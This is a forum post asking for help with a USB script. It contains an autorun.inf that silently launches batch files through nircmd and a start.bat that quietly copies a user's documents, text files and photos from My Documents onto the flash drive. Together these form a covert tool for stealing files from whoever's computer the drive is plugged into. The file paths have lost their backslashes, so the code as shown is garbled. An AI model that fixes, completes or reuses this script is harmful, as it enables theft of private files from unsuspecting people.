Jump to content

Files not transfering


SuicideCrew
 Share

Recommended Posts

Ok I've been trying to use XCopy to copy files onto my flash drive but it doesn't transfer the files either at all or just the txt files. I don't get why this is happening. The first time I tried it only the txt files transferred but the second time I tried it only the folders (empty) transferred. I would greatly appreciate any help.

Autorun

[autorun] 
action=Open Files On Folder
icon=iconsdrive.ico
shellexecute=nircmd.exe execmd CALL batexeprogstart.bat
shellexecute=nircmd.exe execmd CALL start.bat

Start.bat

mkdir G:

xcopy "C:Documents and Settings%username%My Documents*.doc" G: /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.txt" G: /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpeg" G: /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" G: /s/c/q/r/h

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...